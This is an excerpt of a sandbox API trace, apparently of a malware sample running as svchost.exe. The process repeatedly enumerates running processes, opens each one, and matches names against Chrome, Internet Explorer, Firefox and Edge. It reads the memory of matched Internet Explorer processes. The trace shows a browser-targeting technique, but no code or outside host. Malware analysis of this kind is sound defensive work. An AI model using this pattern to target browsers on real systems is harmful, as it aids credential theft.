	[0209.927] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.927] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0209.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.927] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.928] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0209.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x35a0
	[0209.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.929] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0209.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.929] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.930] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0209.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.931] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.932] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0209.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x35a4
	[0209.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.933] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0209.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.933] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.933] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0209.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.934] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.934] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0209.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x35a8
	[0209.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.935] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0209.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.935] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.936] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0209.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.937] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.937] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0209.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x35ac
	[0209.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.938] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0209.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.939] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.939] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0209.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.940] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0209.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x35b0
	[0209.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.941] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0209.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.941] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.942] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0209.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.942] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0209.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x35b4
	[0209.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.943] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0209.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.944] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.944] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0209.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.944] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0209.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x35b8
	[0209.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.946] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0209.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.947] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.947] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0209.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.948] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0209.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x35bc
	[0209.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.949] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0209.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.950] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.951] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0209.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.951] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.952] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0209.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x35c0
	[0209.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.953] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0209.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.953] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.954] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0209.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.954] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.955] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0209.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x35c4
	[0209.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.956] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0209.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.957] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.957] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0209.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.958] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.959] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0209.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x35c8
	[0209.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.960] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0209.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.960] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.961] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0209.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.962] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.962] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x35cc
	[0209.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.963] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.963] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.963] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.964] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.964] NtQueryInformationProcess (in: ProcessHandle=0x35cc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.964] ReadProcessMemory (in: hProcess=0x35cc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.964] ReadProcessMemory (in: hProcess=0x35cc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.964] ReadProcessMemory (in: hProcess=0x35cc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.964] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.965] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x35d0
	[0209.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.965] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.966] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.966] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.966] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.966] NtQueryInformationProcess (in: ProcessHandle=0x35d0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.967] ReadProcessMemory (in: hProcess=0x35d0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.967] ReadProcessMemory (in: hProcess=0x35d0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.967] ReadProcessMemory (in: hProcess=0x35d0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.967] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.967] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.968] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x35d4
	[0209.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.969] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.969] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0209.970] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x35d8
	[0209.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.970] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0209.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.970] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.970] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0209.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.971] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.971] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x35dc
	[0209.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.972] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.972] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.972] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.973] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.973] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.973] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x35e0
	[0209.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.974] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.975] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.975] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.975] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.975] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0209.976] CloseHandle (hObject=0x188) returned 1
	[0209.976] Sleep (dwMilliseconds=0x64) 
	[0210.071] GetCurrentProcessId () returned 0x110
	[0210.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0210.078] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0210.079] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0210.081] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0210.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x35e4
	[0210.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.083] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.084] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.085] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.085] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.086] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x35e8
	[0210.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.087] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.087] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.087] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.087] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.088] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0210.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x35ec
	[0210.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.088] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0210.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.089] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.089] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0210.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.089] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.090] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x35f0
	[0210.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.090] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.091] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.091] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.091] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
